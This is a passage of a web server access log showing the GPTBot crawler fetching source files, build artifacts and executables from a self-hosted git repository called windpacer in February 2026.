"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:13:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" -[17/Feb/2026:13:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" -[17/Feb/2026:13:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 10793] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:13:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 10793] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:13:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" -[17/Feb/2026:13:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" -[17/Feb/2026:13:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 10754] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:13:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist" [Client 74.7.227.38] [Length 9846] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist" -[17/Feb/2026:13:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build" [Client 74.7.227.38] [Length 9852] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build" -[17/Feb/2026:13:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 6846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" -[17/Feb/2026:13:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" [Client 74.7.227.38] [Length 423] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" -[17/Feb/2026:13:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" [Client 74.7.227.38] [Length 9862] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" -[17/Feb/2026:13:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 9863] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" -[17/Feb/2026:13:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 44916235] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:14:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 44945749] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" -[17/Feb/2026:14:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 9451] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" -[17/Feb/2026:14:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 9863] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:14:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 9859] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" -[17/Feb/2026:14:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 9858] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" -[17/Feb/2026:14:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 12196] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:14:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 12156] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:14:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 9457] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:14:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 84370] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" -[17/Feb/2026:14:00:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 283414] [Gzip 11.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" -[17/Feb/2026:14:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" -[17/Feb/2026:14:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" -[17/Feb/2026:14:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" [Client 74.7.227.38] [Length 22470] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" -[17/Feb/2026:14:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" [Client 74.7.227.38] [Length 22470] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" -[17/Feb/2026:14:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 10626] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build" -[17/Feb/2026:14:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 10618] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build" -[17/Feb/2026:14:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 692] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" -[17/Feb/2026:14:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 9864] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:14:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:14:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 11377] [Gzip 5.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" -[17/Feb/2026:14:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 9860] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" -[17/Feb/2026:14:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 11310] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:14:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" [Client 74.7.227.38] [Length 9935] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" -[17/Feb/2026:14:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 12837] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:14:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 18955] [Gzip 10.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" -[17/Feb/2026:14:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 9866] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" -[17/Feb/2026:14:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 9879] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" -[17/Feb/2026:14:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" [Client 74.7.227.38] [Length 10977] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" -[17/Feb/2026:14:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 10818] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" -[17/Feb/2026:14:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" [Client 74.7.227.38] [Length 9940] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" -[17/Feb/2026:14:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 10821] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist" -[17/Feb/2026:14:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" -[17/Feb/2026:14:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" -[17/Feb/2026:14:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 10334] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" -[17/Feb/2026:14:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 12354] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" -[17/Feb/2026:14:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 9865] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" -[17/Feb/2026:14:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 1940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/calculator.py" -[17/Feb/2026:14:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 10333] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" -[17/Feb/2026:14:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr 